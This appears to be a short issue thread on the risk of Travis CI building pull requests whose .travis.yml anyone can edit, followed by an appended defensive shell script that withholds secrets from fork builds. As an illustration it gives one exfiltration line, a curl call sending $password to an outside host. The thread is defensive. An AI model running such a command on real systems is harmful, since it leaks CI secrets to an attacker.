A risk about `Build pushed pull requests`

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify the .travis.yml file in a PR, which means that if Build pushed pull requests is turned on, attackers can do anything in CI.

Such as:

`curl http://example.com/xxx?v=$password`

How to get rid of this risk?

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.


You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

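As an added example (not from this thread or from Travis CI's own code): a POSIX shell guard that skips secret-dependent steps on fork pull requests instead of running them with empty variables. It relies on the TRAVIS_PULL_REQUEST, TRAVIS_PULL_REQUEST_SLUG, TRAVIS_REPO_SLUG and TRAVIS_SECURE_ENV_VARS job variables, whose semantics are assumed here from the Travis docs; the script names in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example: gate secret-dependent CI steps so they are skipped, not
# run with empty secrets, when a build comes from a fork pull request.
# Variable semantics assumed from the Travis CI docs:
#   TRAVIS_PULL_REQUEST       "false" on push builds, else the PR number
#   TRAVIS_PULL_REQUEST_SLUG  owner/repo the PR comes from (empty on push builds)
#   TRAVIS_REPO_SLUG          owner/repo being built
#   TRAVIS_SECURE_ENV_VARS    "true" only if encrypted variables were decrypted
# Returns 0 when secrets may be used, 1 otherwise; the reason goes to stderr.
secrets_allowed() {
  pr="${TRAVIS_PULL_REQUEST:-false}"
  src="${TRAVIS_PULL_REQUEST_SLUG:-}"
  repo="${TRAVIS_REPO_SLUG:-}"
  secure="${TRAVIS_SECURE_ENV_VARS:-false}"

  # A PR whose source repo differs from the one being built is a fork PR:
  # its .travis.yml is untrusted, so never hand it secrets.
  if [ "$pr" != "false" ] && [ -n "$src" ] && [ "$src" != "$repo" ]; then
    echo "secrets withheld: pull request from fork $src" >&2
    return 1
  fi
  # Defence in depth: Travis reports whether it actually decrypted anything.
  if [ "$secure" != "true" ]; then
    echo "secrets withheld: encrypted variables not decrypted for this build" >&2
    return 1
  fi
  return 0
}

# Run a command only when secrets are available; skipping is not a failure,
# so fork PRs still get a green build for the parts that need no secrets.
run_with_secrets() {
  if secrets_allowed; then
    "$@"
  else
    echo "skipping: $*" >&2
    return 0
  fi
}

# Usage in .travis.yml (ci_guard.sh, run_tests.sh and deploy.sh are placeholders):
#   script:
#     - ./run_tests.sh
#     - . ./ci_guard.sh && run_with_secrets ./deploy.sh
```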

Thank you very much

Thank you too